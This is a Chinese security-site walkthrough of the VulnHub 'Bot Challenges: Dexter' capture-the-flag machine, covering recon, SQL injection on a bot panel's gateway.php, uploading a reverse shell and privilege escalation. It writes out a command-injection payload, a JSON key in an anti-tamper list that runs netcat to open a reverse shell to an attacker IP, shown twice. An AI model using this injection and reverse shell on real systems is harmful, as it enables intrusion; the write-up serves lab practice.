freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CTF靶场系列-Bot Challenges: Dexter
2019-08-06 18:54:33
所属地 广东省

下载地址

https://download.vulnhub.com/botchallenges/MurderingDexter.zip

实战演练

使用netdiscover命令查找靶机的IP

image.png

使用nmap查看靶机开放的端口

image.png在浏览器打开

image.png爆破目录

image.png登录页面有输入框,试试注入

POST /Panel/ HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://192.168.0.107/Panel/
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Connection: close
Cookie: PHPSESSID=8q075cd5s8okkfpdv4q57ns722
Upgrade-Insecure-Requests: 1

username=test&password=test&submit=Login

注入失败

image.png查看一下资料,找到gateway.php存在SQL注入漏洞,exp

image.png使用上面的凭据登录

image.png上传反弹shell,显示路径出来了

image.png连接成功

image.png寻找线索,发现变量s可以拼接字符串,所以可以修改这个清单,进行命令注入

image.png

{
"';/bin/nc -nv -e /bin/sh 192.168.0.104 7777 #": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
    "/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
    "/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
    "/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
    "/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
    "/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
    "/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
    "/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
    "/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
    "/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
    "/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}

权限不够修改不了

image.png上传list

image.pngmv提示权限不够,换cat命令

$ cat /var/www/Panel/exes/antitamper.list > antitamper.list
$ cat antitamper.list
{
	"';/bin/nc -nv -e /bin/sh 192.168.0.104 7777 #": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
    "/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
    "/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
    "/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
    "/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
    "/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
    "/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
    "/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
    "/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
    "/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
    "/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}

image.pngimage.png

# ctf靶场系列
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者